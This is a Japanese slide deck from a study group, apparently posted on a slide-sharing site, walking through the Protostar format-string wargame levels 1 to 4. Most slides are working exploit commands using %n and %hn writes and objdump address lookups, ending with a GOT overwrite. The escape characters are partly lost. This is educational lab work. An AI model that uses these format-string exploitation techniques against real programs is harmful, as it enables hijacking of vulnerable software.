Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.

Tachikoma 2013-01

460 visualizaciones

Publicado el

  • Inicia sesión para ver los comentarios

Tachikoma 2013-01

  1. 1. Tachikoma JanuaryMonday, January 28, 13
  2. 2. おしながき • Fusion lv.02, 03, 04 • 5 minutes pythonMonday, January 28, 13
  3. 3. Monday, January 28, 13
  4. 4. WTF!?Monday, January 28, 13
  5. 5. おしながき • Fusion lv.02, 03, 04 • 5 minutes pythonMonday, January 28, 13
  6. 6. おしながき • Protostar format lv.01, 02, 03, 04 • 5 minutes pythonMonday, January 28, 13
  7. 7. おしながき • Protostar format lv.01, 02, 03, 04 • 多めにやるから許してください… • 5 minutes python • import “大学の課題”Monday, January 28, 13
  8. 8. Protostar format 1Monday, January 28, 13
  9. 9. Protostar format 1 • int targetを書き換えればok • C言語だとグローバル変数は0で初期化 • 目標:なんでもいいから0以外にするMonday, January 28, 13
  10. 10. Protostar format 1 • argv[1] を色々変えてあげればいいっぽい • どのへんまでpopすると出てくるか探す • int だから4byte • AAAA%x.... • 手でやっても見つからない…Monday, January 28, 13
  11. 11. Protostar format 1Monday, January 28, 13
  12. 12. Protostar format 1 • 132くらい? • printf(“AAAA%132%x”, <-と同じ); • ってなるっぽい?Monday, January 28, 13
  13. 13. Protostar format 1 • %nを使って適当に書き換えよう • ./format1 `python -c print "x38x96x04x08xx%132$n"` • 8xxyou have modified the target :)Monday, January 28, 13
  14. 14. Protostar format 2Monday, January 28, 13
  15. 15. Protostar format 2 • 変更点 • argvからじゃなくてstdin • targetを64にしないといけないらしいMonday, January 28, 13
  16. 16. Protostar format 2 • 1と同様にpopして探すよ • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format2 • AAAA200,b7fd8420,bffff564,41414141 • target is 0 :( • 今度は4つでいいみたいMonday, January 28, 13
  17. 17. Protostar format 2 • targetのアドレス • user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target • 080496e4 g O .bss 00000004 target • 1と同じ感じで試してみる • user@protostar:/opt/protostar/bin$ python -c print "xe4x96x04x08%4$n" | ./format2 • ? • target is 4 :(Monday, January 28, 13
  18. 18. Protostar format 2 • target=4になった! • %nは書き換わった文字数だよね! • 試してみる • user@protostar:/opt/protostar/bin$ python -c print "xe4x96x04x08x%4$n" | ./format2 • x • target is 5 :(Monday, January 28, 13
  19. 19. Protostar format 2 • もっかい試してみる • user@protostar:/opt/protostar/bin$ python -c print "xe4x96x04x08xx%4$n" | ./format2 • xx • target is 6 :( • 64-4=60 だし… • user@protostar:/opt/protostar/bin$ python -c print "xe4x96x04x08"+ "x"*60 +"%4$n" | ./format2 • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx • you have modified the target :)Monday, January 28, 13
  20. 20. Protostar format 3Monday, January 28, 13
  21. 21. Protostar format 3 • 変更点 • 直にprintf()じゃなくてprintbuffer(char *)をカマせてる • たくさん書き換えないといけないMonday, January 28, 13
  22. 22. Protostar format 3 • とりあえず同じようにしてみる • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format3 • AAAAxx0,bffff520,b7fd7ff4,0 • target is 00000000 :(Monday, January 28, 13
  23. 23. Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c print "AAAA"+",%x"*16 | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :(Monday, January 28, 13
  24. 24. Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c print "AAAA"+",%x"*16 | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :(Monday, January 28, 13
  25. 25. Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c print "AAAA"+",%x"*16 | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :( • 12個目でしたMonday, January 28, 13
  26. 26. Protostar format 3 • targetのアドレス • user@protostar:/opt/protostar/bin$ objdump -t ./format3 | grep target • 080496f4 g O .bss 00000004 targetMonday, January 28, 13
  27. 27. Protostar format 3 • 試してみる • python -c print "xf4x96x04x08" + "x"*256 + "%12$n" | ./format3 • xxxxxxxxxxxxxxxxxxxxx(ry • target is 00000104 :( • 動かないMonday, January 28, 13
  28. 28. Protostar format 3 • マルチバイトや! • 各バイトごとに同じように計算してあげれば!Monday, January 28, 13
  29. 29. • 試してみる • python -c print "xf4x96x04x08xf5x96x04x08xf6x96x04x08%12$n %13$n%14$n" | ./format3 • ? • target is 000c0c0c :(Monday, January 28, 13
  30. 30. • 色々足してみる • python -c print "xf4x96x04x08xf5x96x04x08xf6x96x04x08" + "x"*56 + "%12$n" + "x"*17 + "%13$n" + "x"*173 + "%14$n" | ./format3 • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxx(ry • you have modified the target :)Monday, January 28, 13
  31. 31. Protostar format 4Monday, January 28, 13
  32. 32. Protostar format 4 • 変更点 • targetじゃなくてGOTを書き換える • 目標 • call hello()Monday, January 28, 13
  33. 33. Protostar format 4 • helloのアドレス • # objdump -d ./format4 | grep hello [/opt/protostar/bin] • 080484b4 <hello>:Monday, January 28, 13
  34. 34. Protostar format 4 • pop, pop, pop... • python -c "print AAAA + ,%x*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141Monday, January 28, 13
  35. 35. Protostar format 4 • pop, pop, pop... • python -c "print AAAA + ,%x*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141Monday, January 28, 13
  36. 36. Protostar format 4 • pop, pop, pop... • python -c "print AAAA + ,%x*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141 • 4番目でしたMonday, January 28, 13
  37. 37. Protostar format 4 • 方向性 • exit()を呼ぼうとしたら、hello()が呼ばれるようにしようMonday, January 28, 13
  38. 38. Protostar format 4 • objdump -R ./format4 |grep exit • 08049718 R_386_JUMP_SLOT _exit • 08049724 R_386_JUMP_SLOT exitMonday, January 28, 13
  39. 39. Protostar format 4 • 0x08049724をhello()に書き換えればいいから… • python -c print "x24x97x04x08x25x97x04x08x27x97x04x08" + "x"*168 + "%4$hn" + "x"*976 + "%5$hn" + "x"*132 + "%6$hn" | ./format4 • [1] 4950 done python -c | • 4951 segmentation fault ./format4 • もしかして:入力長すぎMonday, January 28, 13
  40. 40. Protostar format 4 • Google(“help me”); • %nd(nは任意の整数)ってやると0埋めできるでしょ • 普通はnbyte埋めたいときはこうやるらしい…Monday, January 28, 13
  41. 41. Protostar format 4 • もう一回試す • python -c print "x24x97x04x08x25x97x04x08x27x97x04x08" + "x"*168 + "%4$hn%976d%5$hn" + "x"*132 + "%6$hn" | ./format4 • $ %xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxx(ry • code execution redirected! you winMonday, January 28, 13
  42. 42. Protostar format 4 • なんか動いた。Monday, January 28, 13

×